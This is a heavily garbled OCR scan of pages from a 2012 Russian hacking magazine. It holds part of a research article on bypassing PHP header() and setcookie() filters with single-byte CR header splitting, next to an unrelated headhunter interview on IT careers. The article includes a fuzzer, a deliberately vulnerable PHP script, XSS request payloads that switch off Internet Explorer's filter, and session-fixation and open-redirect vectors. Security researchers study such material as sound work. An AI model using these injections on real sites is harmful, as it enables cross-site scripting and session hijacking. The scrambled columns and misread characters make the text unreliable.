П олучается, только lпtегпеt Е хрlогег понимае т куки в таких хидерах. Таким образом, всего-навсего прочитав

RFC

и просмо т рев

исходник и РН Р и три строки т естово г о кода, мы уже выяс н или, как

обойти филырацию функции headeг[J для

IE, и существенно рас­

ширили область применения большинства уязвимостей, которые

~

*

0

Веб

localhost:8080/php·smug/index2.php

Warning: Header may not contain more than \indexl.pbp on line 2

а

single header, oe\v line detected. in

'1

раньше классифи ц иро в алис ь т о л ько как О реп Rediгect. Н о небу­ дем останавливаться на дости г нутом и двинемся дальше. Впереди другие браузеf)Ы и новые идеи.

Работа фильтра функции headeгll в РНР с 2006 года вызываетта кую ошиб к у

+ Д а, ч т ение исход н ых кодов РНР и рассуж д ение с точки зрения

здравой логики уже дало с в ои п ло д ы. Мы нашли сnособ внедрения заголовков для браузера lпteгnet Е хрlогег. Пре д лагаю не останав­

*0

~

Веб

localhost8080/ php·smug/index2.php

Warning : Cookie names can not contain any ofthe foJlo,ving '=,; \t\r\n\013\014' in \indexl.pbp on line 2

'1

ливаться на достиг н у т ом и n р о д олжить начатое исс л едование, что­

бы попробовать доби т ься того же и для д ругих браузеров.

Итак, исходники Р Н Р говорят о филырации % 0а [\nили LFI.

Рабо та ф и льтр а фун к ци и setcookiell по первому аргумен ту

Предnоложим, что сущес т вую т какие-то бай т ы, которые могут ~

служи т ь раз д елителями заго л овков для браузеров. Д л я nроверки этого предположения напишем простой фаззер и запустим его под

различными браузерам и. Н аиболее важные куски кода фаззера

*0

nри в е д ены ниже :

'1

#! / usr / bin / perl use str i ct ; use warni ng s; use Socket ;

Веб

loca lhost8080/ php·smug/ index2.php

Warning: Cookie values can not contain any ofthe foJlowing ',; \t\r\n\013\0 14' in \indexl.pbp on line 2

Работа фильтр а функци и setcookiell по второму аргументу

н улл-байт. Информацию об этой уязвимости я отправил произво­

дителю. Ей был присвое н номер 95992 и уровень риска Low [это не позволило мне получить вознаграждение за ее обнаружение,

listen SERVER , 1е ; $an sw = "НТТР/1.1 2ее OK\r\n" ; for ($ i =e ; $i <256;$i++ ){ $an sw.= "Set-cookie: cook-$i=1" .c hr($i);

что, в общем, справедливо - это ведь скорее ба г, чем уязвимость!.

ту

В итоге в 15-й версии Хрома нул л-байт уже поправи л и, а к моме нт у выхода этой статьи, подозреваю, актуальной будет уже 17-я версия бра у зера. F i гefox же остается на высоте, nоскольку реализован в этой части ровно так, как описано в

$answ .= "\r\n\r\n<h1>Test splitting bytes</h1>" ;

RFC. Следовательно,

ни один

из найденных нами способов обхода филыров Р Н Р для него рабо­ тать не будет. Фаззер очень простой: с его помощью мы выясняем, может

ли какой-т о один байт [под ч ерки в аю, именно одиночный байт,

РАСЩЕПЛЯЕМ ОТВЕТ И ПРОВОДИМ

XSS

а не д ублет! служит ь раздели т елем заголовков в браузерах, как

Настало время воспользоваться найденными в фильтре ошибка­

CR LF [%0d%Dal. Д ля э т о г о на сокетах nишем веб - микросервер,

ми и nроэксnлуатировать уязвимости функции headeг[J, то есть

ко т орый на любой НТТ Р-за п рос браузера дает о т вет, со д ержащий

провести не посредственную атаку. Здесь перед нами встает

х идеры

Set-cookie,

разделенные каждым из

256

байт по очереди.

Соот в етственно, если какой-то байт срабатывает как разделитель,

новая проблема - сами браузеры имеют встроенный механизм защиты от расщепления ответа . Вот как сложно оказывается

поя в ляетс я новый кукис, если же не срабатывает, то к значению

порой эксплуатировать с l iепt - sidе-уязвимости: сначала борешь­

текущего кукисадописывается строка ви д а

ся с фильтрами на серверной стороне, а потом бьешься еще и с

<«N>Set-cookie :.. >> . За­

пускаем скрипт, заходим с помощью браузера, считаем количество проставленн ы х куки, смотрим, какие байты с р аботали, затем nро ­

клиентскими.

Итак, расщепление отве т а глав н ым образом основано на пере­

буем следующий браузер. П роцедура не очень у т омительная, так

даче ложного заголовка Content-Leпgth, который должен говорить

как для тестов мы берем только самые популярные браузеры, кото­

браузеру, сколько байтов содержится в теле НТТР-ответа. Однако

рых всего п я т ь

:-1. Тем

не менее, рекоме нд ую т ебе самос т оятельно

п ри вызове headeг[J сам Р НР отправляет о д ин заголовок Coпtent­

модифицировать фаззер хотя бы для автоматизации подсчета куки

Leпgth со значением О, от этого никуда не деться. Таким образом,

и поиска разделителей [исходники фаззера ищи на нашем диске!.

классический НТТР Response Splitting [расщеnление НТТР-ответаl

Получаются вот такие и н тересные резул ьтаты:

работает только тогда, когда браузеры воспринимаю т второй за­ головок

Content-Length

как истинно верный. Здесь и начинаются

проблемы, поскольку ни один современный браузер так не де­

8/9 %ed Fi r efo x 7 Oper a %ed Chrome %ed %ее ( Is s ue 95992 fi xed i n re l . 15) Safa r i %ed н

лает. Тем не менее, можно nровести атаку для lnteгnet Е хрlогег, воспользовавшись т ем, что этот браузер расnознает Н Т МL-код в от­ вете, даже не читая хидер

Content-Length.

Это более чем странное

nоведение имеет место в браузере с 6-й по 9 - ю версию . П ишем уязвимый Р НР -сценарий:

Как видно, все браузеры, кроме F iгefox, воспринимают оди­ ночный

CR

т очно так же, как и всю последовательность

CR LF.

Вот э т о уже настоя щ ий резул ьтат, благо д аря ко т орому можно н е только выя в и т ь уязвимость, но и сделать атаки на ее основе

<?php header( "X-Header: aaa" .$_GET ( 'r' ] ); ?>

по-настоящему кросс-браузернымиl Отмечу, что, когда я начинал эти из ы ска н ия, ак т уальной была 14-я версия

Goog le C h гome,

дл я

к оторой также существовал альтернативный байт-разделитеть -

Х АКЕР ОЗ/15 8/ 2 01 2

Затем n рово д им атаку nод l nteгnet Е хрlогег посре д ством вот такого НТ ТР -заnроса :

027


COVERSTORY обсудили. Еще один IЕ'шный заголовок, X-Content-Type-Options, ·

/index.php?r=foobar%ed<html>%ed<hl> TEST </h l >

предоставляю тебе разобрать самостоятельно. Остальные заголов ­ ки для управления безопасностью поддерживаются всеми браузе­

Вывод этого с крипта ты сможешь увидеть на соответствую­

щем скриншоте. На первый взгляд, всё уже хорошо. Однако нас

рам и . Однако запомни как аксиому следующее утверждение: заго ­

ловки перезаписываются [за исключением Content-Length). Таким

блокирует встроенный в браузер ХSS-фильтр, когда мы пробуем

образом, header( "Location:

внедрить воттакой сценарий :

дает полноценную уязвимость Open Rediгect при эксплуатации

/index .php?r=foobar%ed<html>%ed<script > alert(/Splitting/)</script>

хотите- верьте, хотите- проверьте. Сейчас я не буду nеречислять

/index.php?lang=" .$_GET[ 'lang' ])

вектора ?lang=aaa % 0dlocation:http://yandex.гu. Как говорится, все возможные заголовки lпрочитать о них ты сможешь на соответ­ ствующей врезке), а остановлюсь лишь на самых значимых. Итак, Access-Contгoi-AIIow-Oгigin- это за гол овок, который

Пройти такой путь и не получить желаемого результата, упер­ шись в какой-то там фильтр,- это не для нас. Вспоминаем, что мы

работает nочти nод всеми браузерам и, кроме Орега, в том числе

можем не только управлять телом ответа сервера, но и внедрять

под lnteгnet Ехрlогег 8+, Fiгefox 3.5+, Safaгi 4+ и Google Chгome. Для

заголовки. К тому же ХSS - фильтр lпtегпеt Ехрlогег, несмотря на то

начала советую ознакомиться с первоисточником lmzl.la/4sгnwml.

что он сильно прибавил в сигнатурах по сравнению с 9-й версией

Как видно, этот заголовок можно использовать с дополнительными

браузера, всё так же, как и раньше, отключается с помощью специ­

за гол о в ка ми Access-Contгoi-AIIow- Methods,

ального заголовка X-XSS-Pгotectioп: О. Ну вот, последний кусочек пазла встал на место, и теперь можно проводить полноценную

Headeгs, Access-Contгoi-Max-Age и некоторыми другими [снова обрати внимание на приведенную выше ссылку ). Назн аче ни е этих

атаку.

заголовков, думаю, ясно из их названий. Access-Contгoi - AIIow­

Финальный НТТР-запрос к уязвимому сценарию имеет следую­

Access - Contгoi-AIIow­

Oгigin можно исnользовать как для усиления, так и для ослабления безоnасности . Всё дело в том, что если этот заголовок не содер ­

щий вид:

жится в ответе, пришедшем от сервера, то доступ через XHR к со­

/index2 .php?r=foobar%edx-xss-Protection:e%ed<html>%ed <script >a lert( /xss/)</script>

держимому тела такого ответа запрещен. Таким образом, мы можем внедрить заголовок «Access-Contгoi-AI I ow-O гigin : •" и nрочитать полный ответ со всеми конфиденциальными д анными.

ЧЕРЕЗ ТЕРНИИ К ЗВЕЗДАМ Мы начали с чтения RFC, затем заглянули внутрь РНР, потом плав­

ОСМАТРИВАЕМСЯ

но перешли к изучению механизмов, применяемых браузерам и для

Итак, мы нашли определенные уязвимости функции headeгll. На­

обработки ответа, и вот, наконец, получили важные результаты.

стало время узнать, существуют ли какие-нибудь другие функции,

Мы разобрались с lntегпег Е хрlогег и рассмотрели внедрение за­

выnолняющие аналогичную фильтрацию. Собственно, в РНР име­

головков в НТТР -о тв ет. Сам метод не является частным случаем

ется всего три функции, которые занимаются о тправ кой заголов­

расщепления ответа, так как при его использовании появляется

ков: headeгll, setcookiell и setгawcookiell. В результате недолгого

только лишний заголовок, а не вторичное тело ответа. А если мы

изучения легко выясняется, что две последние функции, так же

не внедряем тело ответа, то и проблем с Conteпt-Length у нас тоже

как и headeгll, уязвимы в аргументах $path и $domain . Уязвимые

не будет, ведь, согласно RFC, протокол НТТР никак не регулирует

аргументы есть, но их модификация пользователем в Приложениях

количество заголовков . Теn ерь предлагаю nойти дальше и nристу­

встречаетс я довольно редко. Обычно от nользовательских nара­

пить к изучению др угих потенциально внедряемых заголовков, тем

метров зависит только имя или зна чени е куки, но никак не домен

более что мы еще не выяснили, как проводить атаку под остальны­

и не путь . Поэтому исследование следует продолжить . В имени и значениикукивыполняется гораздо более строгая фильтрация,

ми браузерам и.

чем в функции headeгll:

ВНЕДРЯЕМ ЗАГОЛОВКИ Как уже было отмече н о выше, заголовки не влияют на Content-

Length, а значи т, их можно внедрить в НТТР- ответ для любых браузеров. В настоящее время существует н емало заголовков для управления безопасностью, один из которых, X-XSS-Pгotection, управляющий встроенным ХSS-фильтром l nteгnet Ехрlогег, мы уже

i f (name && strpbrk(name, "=,; \t\r\n\el3\el4" ) != NULL) { !* man isspace for \ еlЗ and \ el4 */ zeпd_error( E_WARNING, "Cookie names сап not coпtain any of the followiпg'=,; \\t\\r\\n\\el3\\el4' " );

ЗАГОЛОВКИ УПРАВЛЕНИЯ БЕЗОПАСНОСТЬЮ 1. X-Frame-Options. Содержит список доменов,

Coпteпt-Security-Policy : allow http://*:80.

идентификатор сессии, а затем просто

с которых данный сайт может быть загружен

З.

подождать, пока пользователь авторизуется,

в ifгаmе/fгаmе-контейнер . Для проведения атаки можно использовать X-Frame-Optioпs : allow-fгom

attacker. 2. X-Content-Security-Policy.

Refresh . Старый добрый Refгesh . Дает внедрение HTML при использовании dаtа­ схемы или Open-гedirect : Refresh : 1,data:text/ html,<h1>0K</h1>. В таком содержимом Chгome

и использовать этот заголовок для вторичной

аутентификации. Вектор может выглядеть примерно следующим образом: foobaг :% 0d5et­

список доменов, с которых разрешается

сценарий выполняется не в целевом домене ,

Cо о k i е: Р Н Р5 Е 551 D= FA К Е D%0d Locat ion=/ auth.php. Разумеется, такая схема будет

загрузка содержимого . Скажем, если сервер

а в той самой data-c x eмe, что не позволяет

работать только в том случае, если веб­

устанавливает в ответе X-Content-Secuгity­

злоумышленнику провести

приложение после авторизации не отправляет

Policy : allow 'self', то код <script src="http://at-

4. Set-cookie. Его я привожу здесь

tackeг.com/1.js"><scгipt> работать на странице

исключительно для полноты. Используя

На практике

не будет. Таким образом, в значении для

этот заголовок, можно установить заранее

для 5ession Fixatioп !именно так называется

проведения атаки необходимо указывать Х-

готовый lто есть известный злоумышленнику!

эта атака!.

028

Содержит

фильтрует scгipt . Но, как бы там ни было,

XSS.

пользователю новый идентификатор сессии .

99% РНР-приложений уязвимы

ХАКЕР

03/158/2012


Расщепляй и властвуй

11[~ .tf] http://t~stcom:8080/php·smug/i ndexl.php?rsfoobar%0d <html > %0 Р

х

Find: j9

1

Conten t-Lenиth:

PI'N~ous Nежт.

1

1

..

С, Х ' ~ testcom

Options .. 1

2 Keep-Alive: timc:ou\-5, max"" IOO Connecrion: Keep-Ative Content-Type: textlhtml

TEST Content·Lengtb: 2 Keep-Alive: timeout=5, ma:-;;=1 00 Connectioп : Keep-Alive Content-Typc: textlhtml

IE распознает НТМL-содержимое даже

перед Coпteпt-Length, то есть прямо в заголовках

return FAILURE ; }

if ( !u rl_encode && value && strpbrk(value, ",; \t\r\n\013\814" ) != NULL) { /* man isspace for \ 813 and \ 814 */ zend_error( E_WARNING, "Cookie values сап not contain any of the following',; \\t\\r\\n\\813\\814'" ); return FAILURE;

1 lnternet

Eжplorer has mod ified this page to Mlp prevent cross·site кripting.

Срабатывание ХSS-фильтра в

IE

chrome 4896 safari 4891-LEN(cookie_name) opera 4896 firefox 4896 iexplore 5116- LEN (cookie_name) ПЕРЕЗАПИСЬ КУКИ ПРИ ПЕРЕПОЛНЕНИИ ЧИСЛА Как всегда, лучше начать с чтения

RFC: www.ietf.oгg/гfc!rfc2109.txt . RFC следует обратить на фразу << at least 20 cookies рег unique host ог domain name». Здесь не говорится четко, следует ли браузерам хранить 20 кукинахост или 20 Особое внимание в этом

} Функция stгpbгkll возвращает ложь, если в первом аргументе присутствует хотя бы один байт из второго аргумента. Как видно,

куки на домен. Пусть сами решают. Видимо, в 1997 - м г оду это

фильтрация именикукиотличается от фильтрации значения только

казалось нормальным, но сейчас, когда существую т монстры

одним байтом- символом равенства. Прежде всего мне захотелось

с сотней поддоменов, этот вопрос более чем актуале н.

проверить функцию фильтрации. Она является полным аналогом

Итак, когда я прочитал этот

RFC,

то принялся искать настройки,

!вернее, прототипом] РНР'шной stгpbгk l php.su/fuпctioпs/?stгpbrk ] ,

определяющие максимальное количество к у ки в брауэерах, и про­

которая оказалась небинарно совместимой . Казалось, зто победа,

верять, распространяются ли эти настройки на nоддомены . Вот что

но не тут-то было! Дело в том, что сама встроенная в РНР функция

пол у чилось:

передачи ответа от сервера такженебинарно совместима, то есть

нулл-байт обрывает с тр оку как раз в том месте, где мы могли бы провести внедрение заголовка или тела отве т а. В итоге бра у зер получает уже укороченную по нулл-байту строку. Дальше был фаззинг, много фаззинга . И никаких идей о том, как обойти

фильтрацию, хотя в старых версиях РНР символ= не обрезается.

Новые версии не содержатуязвимости lя проверил их все с

chrome 188 safari -2888/ LEN (cookie_na me+cookie_va l) opera 68 firefox 149 iexplore 49

2010

года ] .

Как видно, эти значения не равны

20,

но все-таки суще­

ственно меньше 10000 :-].Что касается поддоменов, то общее

ОСОБЕННОСТИ

COOKIES

числокукисохраняется только для Орега и Chгome, остальные

Фаззин г всегда дает какой-то результат, пусть даже не совсем тот,

ведут отсчеткукиотдельно для каждого поддомена . Ситуация

на который рассчитываешь изначально. Эксперименты с фильтра­

забавная, потому что можно скинуть куки вышестоящего домена

цией внутри первых двух аргументов setcookiell и setгawc o okiell

с нижнего уровня . А можно ... Можно узнать имена куки выше­

тоже принесли свои плоды. Я выяснил забавные особенности об­

стоящего домена. РоС этого ба га для О ре га и Chгome фактиче­

работки куки в браузерах и хочу рассказать об этих особенностях

ски представляет собой общий скоуп о гр аниченного числа куки.

в с т атье. Ведь уязвимости вторичны по сравнению с теми метода­

Что будет, когда с ниже с тоящего домена придет IN+1]-й кукис?

ми, с помощью которых они были найдены. Как гласит китайская

Он перезапишет како й -токукис из скоупа. Правильно, а ка-

народная мудрость, отдашь свою рыбу- накормишь товарища

кой? Самый старый? Нет, в том и при кол, что он выберет кукис

на день, научишь его ловить рыбу- накормишь на всю жизнь .

по алфавит у . Пахнет бинарным поиском? Да, именно так! С по­

Но хва т ит лирики, перейдем непосредственно к результатам.

мощью этой штуки мы можем искать именакукивышестоящего домена с нижестоящего под Орега и Chгomel Н о писат ь ко д под

БЛОКИРУЮЩАЯ ДЛИНА ЗНАЧЕНИЯ КУКИ

эту задачу муторно и не особенно нужно, ведь в реальной жизни

Если в качестве значения кукису передать больше символов, чем

значения куки куда важнее, чем их имена, которые, как правило,

поддерживает браузер, кукисне проставится. Я воспользовался

являются статическими. Итак, подведу итог. Оказывается, мож­

этой особенностью, когда мне на практике необходимо было до­

но скидывать куки, если есть возможность проставить много

биться того, чтобы такой вот код не ставил куки :

своих. Иногда для одного домена, иногда также для п оддоменов

ICh гome, Орегаl.

<? php setcookie( "param8" , "PREFIX_" .$_GE T[ 'p8' ]);

leilii;Jel В завершение статьи я бы хотел призвать тебя nродолжить мое

?>

исследование и начать свое, более современное и интересное.

Для решения этой задачи требуется

4096

символов . Предпо­

Надеюсь, мне удалось отразить не только суть различных ба го в

лагается, что лишняя длина обрежется. Однако абсолютно все

типа НТТР

браузер ы вообще не ставя т такие кукисыl Следовательно, если

ку и изучению. А если нет- обещаю найти время и си лы , чтобы

кукис уже существует, он не п ерезапишется. Это круто помогло при

написать новые статьи для журнала. На все воnросы

написании сплойта под уязвимость типа Sessioп Fixatioп. Вот такие

и не только с радостью отвечу в своем благе i oxod . гu ]. Сnасибо

показатели блокирующей длины значениякукиполучаются под

за внимание и до новых встречl :Х:

Response Splitting,

но и описать сам подход к их п оис­

no

с т атье

разными браузерам и:

ХАКЕР

03/1 58/20 12

029


COVERSTORY

&ИОГРАФИЯ Окончиnафакультет

журналистики МГУ.

Работала редактором 11 главным редактором в раэnичных иэданиях. Участвовала в соэдании портаnа гabota.ru, вэявwего nремию Рунета.

запустила проект PaбoтalaMa\\.Ru. Зкс-хантер Ma\\.Ru Gгoup.

Основатель агентства интернет­ рекрутмига PRUFFI. один иэ ведущих экспертов рынка хантинга в рунете.


Интервью с вед ущим хедх антером рунета

ИНТЕРВЬЮ С ВЕДУЩИМ

АЛЕНА ВЛАДИ М И РСКАЯ

ХЕДХАНТЕРОМ РУНЕТА

О РАБОТЕ ХАНТЕРА

fгiends). Каждый из нас является носи­

Многие воспринимают хедхантеров как раз­

до

1,5

миллионов рублей в месяц.

телем информации о тех людях, с кото­

датчиков хлеба в блокадном Ленинграде. Все

рыми работает. Именно вы, а не хан тер

Раз в квартал мы делаем свои обзоры,

думают, что если дружить с нами и знать вол­

сnособны nравильно оценить этих

где ставим реальные зарплаты (pгuffi.

шебный телефончик ведущего хантера в рунете,

людей. Вы работаете с ними каждый

гu/analitika) . Цифры , которые мы nри­

то зто как дополн и т ельная пай ка хлеба. Ты зна­

день и точно можете сказать, кто есть

водим, на

ешь продавщицу, и она вроде как может дать

кто: вот этому товарищу вообще ничего

тике от известных рекрутинговых nро­

тебе дополнительный сухарик . Н о на самом

нельзя nоручать, а вот этот реально

ектов. Почему? Объясню на nримере .

деле не может. Боле е того, во время блокады

крутой чувак.

30-40%

Мы знаем, что nрограм­

за зто расстреливали . Знание этого волшебного

телефона, по сути, ничего не дает.

мист на

Хантер обычно знает Но большинство технических

Буквально недавно у меня три дня не работала

сnециалистов - люди неnублич-

чинающий , так как сейчас это

счел меня каким-то

ные. Рекрутеру очень трудно до ни х добраться, потому что они закрыты

того, как я разместила объяв ление о том, что

внутри комnаний. К nримеру, в мэрии

:1

В результате

работает

800

ление. Когда мы видим вакансию

для RuЬу-nрограммиста за

nрограмм истов, но как

пания его не найдет. Однако в обзорах

ты до них достучишься? Как добраться

сотрудников, потому что мы не успевали раз­

до того человека, который реально сидит

бирать почту. Пи сьма падали такой лавиной,

и кадит nочту каждый день? Это nрактически

что весь

невозможно.

си дел и разбирал их неделю .

60 тысяч,

мы понимаем, что за такие деньги ком­

пришлось срочно набирать дополнительных

PRUFFI

100 тысяч

самое востребованное наnрав­

страшным спамером . А с л училось зто после

мы ищем людей для Google.

не может

рублей, если он не совсем на­

Бывают дни, когда у меня «сносят» почту.

Gmail

Ruby

стоить мень ше

только публичных людей.

почта, потому что

выше, чем в анали ­

зарnлат аналитики учиты вают занижен­ ные зарплаты, в результате чего итоговые

цифры получаются недостоверными .

ГДЕ РАБОТАТЬ?

Количествооткликовоченьзависитотсамой

Каждый программист знает такого же второ­

вакансии. В среднем бывает порядка

го . Он знает, что вот этот- хороший програм­

Если вы можете идти работатьврунет­

откликов, но до ходит и до обвалов. Летом была

мер , а этот- <<сачок» и ничего делать не будет.

идите в рунет! Ни один сектор не будет так

вакансия управляющего в венчурный фонд­

Мы открываем вам вакансии- рекомендуйте

развиваться , как рунет и

пришло около

своих друзей на эти вакансии . Это работа,

800 откликов за два дня .

В среднем одну вакансию вает от

50-60

PRUFFI

60 000 до 90 000 человек

но. То есть я давно уже СМИ.

просматри­

ежеднев­

:1

IT

в целом.

а любая работа должна быть оnлачена. Если

У крупных порталов всегда жуткая нехватка

она сделана усnешно и мы устроили человека

людей, особенно технических сотрудников .

по вашей рекомендации , мы вам заплатим. То есть клиент nеречислил нам деньги

Это богатые компании, и у них нет ограничений

вроде << в этом году мы воэьмем только

за хантинг. Мы , не раскрывая клиента, рассказали вам о том, что есть такая

замечательная вакансия. Вы кого-то

20

чело­

век, и не больше!>>. Они берут многих и заин­ тересованы во всех, у кого есть необходимый уровень комnетенции и адекватность.

nорекомендовали и, если хорошо

Хантер не является носителем

сделали свою работу, nолучили

какой-то супертайны и су­

вознаграждение

перэкспертизы. Что до нас

1000 евро.

Это

кажется нам сnраведливым.

представлял собой средний

Если вы выбираете, чем заниматься в рунете,

и у вас хоть немного математический склад ума- учитесь программить. Даже если потом

вы не будете nрограммировать, ценность пре­

хантер? Очень д орогой

Раньше за рекомендации

дакта [Pгoduct Manageг'al, который в прошлом

костюм, суперджип- в се на вор оты.

никто не платил. Н о в результате нашего

Он приезжал, выкладывал ай пади к,

подхода о гр омный объем данных оспе­

центов на

айфончик и еще

циалистах, о профессионалах , вышел

договориться с nрограммистами. Наnрим ер,

наружу .

я не смогу с ними договориться- любой

15

молескинчикав

и говорил клиенту: <<Мои услу ги стоят

Мы заявили, что никакой <<офигенной

30.

Почем у? Пот ому, что вы сможете

nрограммер меня обманет.

три оклада кандидата, потому что я об­

ладаю офигенной эксnертизой».

это умел, будет значительно выше- nро­

:1

Он скажет: <<это

РRUFFiпервойсталауказыватьзарпла­

невозможно» или <<чтобы это сделать, нужно

ты в топовом сегменте рунета. То есть

два года >> [хотя в реале- три дня), и я ему nо­

буквально: <<Э та позиция с т оит рублей в месяц. Эта стоит

эксперты на рынке- все вы. Для этого мы

Через нас люди узнали о величине компенса­

nридумали приложение для социальных сетей

ций вице-nреэидентов nорталов: стало nонят­

Рунет долго был закрытой системой, где

PRUFFI Fгiends [apps.facebook.com/pгuffi

но, что тоn-менеджеры nолучают от

вершиной карьеры была работа в Яндексе . То

03/158/201 2

рублеЙ >>.

верю. Если вы разбираетесь в коде, вам будет

экспертизы» не существует. На самом деле

ХАКЕР

600 тысяч

400 тысяч

700

тысяч

значительно легче. И вашей команде тоже.

031


.. COVERSTORY есть ты шел-шел, и становилось ясно: в конце

Смотрите на мир с точки зрения «мобиль­

идет о зарплатах от

концов тебе нужно прийти в Яндекс, начать

ности». Доступ к интернету с компьютера

понятно- очень большая степень ответствен­

там работать- и для тебя это будет санаторий.

уходит в прошлое. Он, конечно, и дальше будет

ности. У нас были такие запросы от банков, ко ­

Яндекс был чем-то вроде Олимпа! Боги все

использоваться для посещения интернет­

торые проходили, видимо, по верхней границе

сидели в Яндексе. Они именно с таким рас­

ресурсов, но еще год-два, и компьютер

четом строили свой НR-бренд: все эти гамаки,

перестанет быть основным устройством

бесплатная еда и прочие бонусы. В коридорах

для этого. Такими устройствами ста-

там можно' встретить Илью Сегаловича . При­

новятся мобильные и планшетники.

глашение работать в Яндексе было равносиль­

Почему это важно с точки зрения

но тому, что к тебе спустился Зеве и погладил

карьеры? Потому, что програм-

тебя по голове.

:1

И в Яндексе действительно

диапазона

200 000

рублей и выше . Это

-180-200 тысяч

рублей . Порталы

предлагали меньше- порядка

100-120

тысяч . Бывали запросы и от системных интеграторов, там где-то порядка

140

тысяч . Это цены по Москве.

мисты, и продакт-менеджеры,

хорошо . Но это давно не единственная воз­

и всё, что сегодня делается для

можная конечная точка карьеры.

мобильных платформ Andгoid, SymЬian,

КАРЬЕРА ПРОГРАММИСТА Сегодня самое прекрасное

liOS, Windows

-быть программ истом.

Перестаньте думать в рамках рунета. Интер­

Phonel,- всё востребован но. И будет

Вы понимаете основы бизнеса, основы

нет стал международным. В Россию пришли

востребован но. Зарплаты растут по всем

профессии, вас легче всего поднимать

все ведущие компании, а кто не пришел, тот

направлениям.

и растить. Ведь бизнес- он не про сер­

придет в течение года. Мы искали сотрудников

вера. В основе нашего бизнеса лежит код.

для русского

Интернетстановитсявсёболеесегмен­

Это и есть платформа. Поэтому, если вы

для

тированным. Раньше вы могли строить

умеете программить, ваша карьера будет

Facebook и Google, мы искали Fouгsquaгe, для Linkedln и многих других

компаний. Неважно, придет ли компания сама,

карьеру следующим образом: сегодня я

развиваться настолько, насколько вы за­

как

РМ

хотите расти и насколько этому помешает

Linkedln,

или купит какую-то другую ком­

IProduct manageri, завтра занимаюсь

панию, как это сделал Gгoupon. Прис утствие

маркетин гом , послезавтра- снова РМ,

будет! Поэтому смотри на мир шире, смотри

дальше вообще главный редактор. Сей-

личная жизнь.

на мировые тренды- это поможет тебе и в

час, к сожалению или к счастью, всё больше

У программиста много путей развития.

карьере в том числе.

требуется узкая специализация. Тот же марке­

Первый- вы можете всю жизнь любить код.

тинг начинает делиться на кучу направлений:

В таком случае вы сначала становитесь nро­

Я не считаю, что он разделен на нашу Пре­

вот трафик, вот контент, вот брендинг и так

грамм истом, потом руководителем группы, по­

красную Страну и весь остальной ад. Уверена,

далее. Надо выбрать одно направление: если

том руководите разработкой крупного портала.

что человеку должно быть интересно работать

пять лет назад вы могли бы спокойно nерейти

Это если вы не хотите останавливаться. Или

и интересно расти, что он сам волен выбирать .

из сегмента брендинга в сегмент, связанн ый

второй вариант- сначала вы работаете про­

Зарплаты !именно в интернет-сектореl у нас

с трафиком, то сегодня это будет довольно

граммистом, а потом РМ'ом технологического

сейчас сравнимые, а чаще даже выше, чем

сложно.

nроекта. Затем делаете свой стартап или, если

на Западе. Если человеку сейчас интересно по­ работать в центре игровой индустрии в

Zynga-

это технологическое направление вообще Винтернет nришло множество не интернет­

это понятно, и это его выбор. И если он уезжает

ных компаний. Например, МТС с

по приглашению

<<Связной» с

Zynga,

так как компания здесь

Enter.ru

Omlet.ru,

и т. д.- их очень много.

выделяется в отдельный бизнес при портале, руководите уже целым направлением. Класси­ ческий пример- Леша Терехов. Его я нашла,

не работает,- это тоже его выбор .

Они заинтересованы в привлечении

Не вижу здесь никакого предательства.

большого количества людей . Денег

риант- вы можете очень долго расти, а nотом

у них тоже много, они даже могут вы­

стать фактически евангелистом какого-либо

делять внутренние стартапы.

наnравления, как Гриша Бакунов в Яндексе.

PRUFFI

открыла стартапы как точку

развития. Но стартапы тоже нужно

когда он был в маленьком стартапе. Третий ва­

Ну и конечно, вы можете быть программистом,

разделять. С точки зрения найма

Не бойтесь уезжать учиться по хоро­

прийти в технологическую компанию и дорасти

мы выделяем две категории стар­

шим, интересным зарубежным про­

до ее гендиректора.

тапов: с инвестициями до $500 000 и более $500 000. Но это лишь один

граммам. Вы всегда сможете вернуться,

и в качестве классического примера здесь

если захотите. Но вернетесь более

можно nривести Дмитрия Гришина, который

из критериев. Очень важно объяснить

востребованными. Более того, смо­

начинал в

молодому человеку, который не всегда

жете, скорее всего, поднять там денег

генерального директора

сам хорошо это понимает, что не нужно

и вернуться уже не в статусе наемно-

идти в плохую компанию: там его об­

го работника, а в статусе создателя

манут, ничему не научат

бизнеса. Классический

и вообще будет стресс,

nример-СергейФаге

ад и всё плохо.

и его

Ostrovok.ru.

Таких

примеров довольно много.

Шансов сейчас много! Ты можешь выбирать направления для развития. То есть, условно говоря, если тебя не взяли в Яндекс

По сравнению с объемами с информационной безопасно­

-это не конец света . Если сейчас

стью, незначительна и несерьезна.

тебе хочется работать по найму, то

Спрос на специалистов, эанимающих­

дальше, возможно, захочется открыть

свое дело lи если это будет интернет/IТ, мы, опять же, nоможем!. Потом, если стартап

Molotok.ru,

ся информационной безопасностью, крайне мал. Но то, что он растет,- факт.

Это четвертый вариант,

а сейчас занимает пост

Mail.ru.

ПРО ТРЕНДЫ Нынешние тренды таковы:

1. Ruby- за

сезон востребованность програм­

мистов выросла на

более чем на общего бизнеса ниша, связанная

:1

2.

86 %,

а зарплаты поднялись

40 %.

Всё, что связано с мобильными платформа­

ми,- и разработка, и маркетинг.

3. 4.

Весь геймдев. Всё, что связано с

e-commerce,-

во с­

требованность и зарплаты за последний год выросли более чем на

50% . Это

направление

особенно востребован но.

Особенность зарождающегося тренда со­

будет удачным, ты, возможно, продашь бизнес

стоит в том, что вилка зарплат чрезвычайно

и вернешься к работе по найму, но уже совсем

велика: сумма может варьироваться от очень

ков

на другом уровне . Мы показываем «объемную

небольшой до действительно крупной. Когда

мобильные и планшетные устройства начинают

картинку», а для многих людей это очень важно .

приходят подобные запросы иэ банков, речь

всё активнее использоваться для доступа к ин-

032

Наблюдается острая нехватка разработчи­

iOS

и Andгoid. Бизнес почувствовал, что

ХАКЕР

03/158/2012


Интервью с ведущим хедхантером рунета

тернету вместо стационарных компьютеров .

ни ков в Москву и, к примеру, компенсировать

и скажут: <<Вот тебе доля в компании и не­

Отрасль оказалась к этому не готова ни в плане

затраты на съем жилья, но нельзя сказать, что

сколько миллиардов, иди делай собственный

количества, ни в плане качества специалистов.

это массовое явление. Однако такие случаи

НR-дивизион>> , я что, откажусь? Нет. Нужно

Результат- резкий рост востребованности

учащаются.

пони мать , что мир сейчас полон шансов. Шанс

В любой большой компании всегда есть люди,

быть активным, чтобы повысить вероятность

Уменьшается популярность РНР-шников

которые уже переросли уровень работы

этого. Хотя бы вести благ.

и Регl-программистов. Если вы занимаетесь

по найму. Это ценные сотрудники: с ними всё

и зарплат мобильных разработчиков.

может появиться в любой день, и очень важно

Регl, вероятно, вам нужно подумать, на какой­

хорошо, но оставить их в наемных сотрудниках

В случае с блогом важно пони мать, что он

